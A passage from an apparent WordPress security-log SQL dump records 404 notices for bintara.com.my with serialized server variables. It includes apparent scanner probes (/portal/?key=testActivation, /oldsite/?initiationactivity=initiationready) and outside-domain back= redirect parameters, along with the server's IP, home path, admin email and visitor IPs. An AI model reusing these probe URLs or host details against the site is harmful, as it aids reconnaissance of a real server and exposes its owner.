deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:124:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fbestlaptopscollegestudents.blogspot.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"152.44.109.239\";s:11:\"REMOTE_PORT\";s:5:\"52492\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa2-ihAAxqfYqgF3mYe4wAAAAFM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571667850.4914\";s:12:\"REQUEST_TIME\";s:10:\"1571667850\";}}','notice','2019-10-21 14:24:13','2019-10-21 14:24:10',35317488,37120064,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fbestlaptopscollegestudents.blogspot.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'152.44.109.239'),(28620,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.62 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"152.44.109.239\";s:11:\"REMOTE_PORT\";s:5:\"24309\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa2-khAAxqfYqgF3mYe4xQAAAFI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571667858.7517\";s:12:\"REQUEST_TIME\";s:10:\"1571667858\";}}','notice','2019-10-21 14:24:20','2019-10-21 14:24:19',34922384,36729520,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'152.44.109.239'),(28621,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/6.2.4091.2 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"207.182.24.98\";s:11:\"REMOTE_PORT\";s:5:\"60679\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa3HvqAwEvHJaKWJ1hYzSAAAABg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571669950.508\";s:12:\"REQUEST_TIME\";s:10:\"1571669950\";}}','notice','2019-10-21 14:59:13','2019-10-21 14:59:10',35411008,37216560,'https://bintara.com.my/?page_id=18',1,0,'207.182.24.98'),(28622,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:27:\"/portal/?key=testActivation\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/portal/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:8:\"/portal/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa3LgqAwEvHJaKWJ1hY0QAAAABc\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/portal/\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/portal/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa3LgqAwEvHJaKWJ1hY0QAAAABc\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.39.111\";s:11:\"REMOTE_PORT\";s:5:\"52568\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/portal/\";s:10:\"SCRIPT_URL\";s:8:\"/portal/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa3LgqAwEvHJaKWJ1hY0QAAAABc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571670914.1688\";s:12:\"REQUEST_TIME\";s:10:\"1571670914\";}}','notice','2019-10-21 15:15:15','2019-10-21 15:15:14',34967168,36767000,'https://bintara.com.my/portal/?key=testActivation',1,0,'166.62.39.111'),(28623,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:43:\"/portal/?initiationactivity=initiationready\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/portal/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:8:\"/portal/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa3MO6AwEvHJaKWJ1hY0pQAAABA\";s:19:\"REDIRECT_SCRIPT_URI\";s:30:\"https://bintara.com.my/portal/\";s:19:\"REDIRECT_SCRIPT_URL\";s:8:\"/portal/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa3MO6AwEvHJaKWJ1hY0pQAAABA\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"166.62.39.111\";s:11:\"REMOTE_PORT\";s:5:\"50180\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:30:\"https://bintara.com.my/portal/\";s:10:\"SCRIPT_URL\";s:8:\"/portal/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa3MO6AwEvHJaKWJ1hY0pQAAABA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571671099.6446\";s:12:\"REQUEST_TIME\";s:10:\"1571671099\";}}','notice','2019-10-21 15:18:22','2019-10-21 15:18:20',34970504,36765272,'https://bintara.com.my/portal/?initiationactivity=initiationready',1,0,'166.62.39.111'),(28624,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:114:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fidigitalreview.blogspot.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Maxthon/5.2.3.2000\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:112:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fidigitalreview.blogspot.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.180.4.197\";s:11:\"REMOTE_PORT\";s:4:\"7603\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa3XGeAgYuZ1@aLzbZj3aAAAAJc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571673881.8315\";s:12:\"REQUEST_TIME\";s:10:\"1571673881\";}}','notice','2019-10-21 16:04:43','2019-10-21 16:04:42',34927136,36728904,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fidigitalreview.blogspot.com&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'139.180.4.197'),(28625,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/oldsite/?initiationactivity=initiationready\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/oldsite/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:9:\"/oldsite/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa3XH@AgYuZ1@aLzbZj3awAAAIM\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/oldsite/\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/oldsite/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa3XH@AgYuZ1@aLzbZj3awAAAIM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"164.132.44.97\";s:11:\"REMOTE_PORT\";s:5:\"46698\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/oldsite/\";s:10:\"SCRIPT_URL\";s:9:\"/oldsite/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa3XH@AgYuZ1@aLzbZj3awAAAIM\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571673887.2524\";s:12:\"REQUEST_TIME\";s:10:\"1571673887\";}}','notice','2019-10-21 16:04:48','2019-10-21 16:04:47',34969464,36774280,'https://bintara.com.my/oldsite/?initiationactivity=initiationready',1,0,'164.132.44.97'),(28626,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:108:\"/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:128:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.79 Safari/537.36 Maxthon/5.2.3.2000\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:106:\"page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"139.180.4.197\";s:11:\"REMOTE_PORT\";s:4:\"9109\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa3XI6AwEvHJaKWJ1hY21gAAABI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571673891.7536\";s:12:\"REQUEST_TIME\";s:10:\"1571673891\";}}','notice','2019-10-21 16:04:53','2019-10-21 16:04:52',34923752,36719592,'https://bintara.com.my/?page_id=18&error=DIFFERENT_DOMAIN&back=http%3A%2F%2Fvintageguitar.mobi%2F&imz_s=71ijtt6k4jpkolbkbcarqm7ui0',1,0,'139.180.4.197'),(28627,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:28:\"/oldsite/?key=testActivation\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/oldsite/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:9:\"/oldsite/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa3XRuAgYuZ1@aLzbZj3kgAAAIY\";s:19:\"REDIRECT_SCRIPT_URI\";s:31:\"https://bintara.com.my/oldsite/\";s:19:\"REDIRECT_SCRIPT_URL\";s:9:\"/oldsite/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa3XRuAgYuZ1@aLzbZj3kgAAAIY\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"164.132.44.97\";s:11:\"REMOTE_PORT\";s:5:\"50448\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:31:\"https://bintara.com.my/oldsite/\";s:10:\"SCRIPT_URL\";s:9:\"/oldsite/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa3XRuAgYuZ1@aLzbZj3kgAAAIY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571673926.1137\";s:12:\"R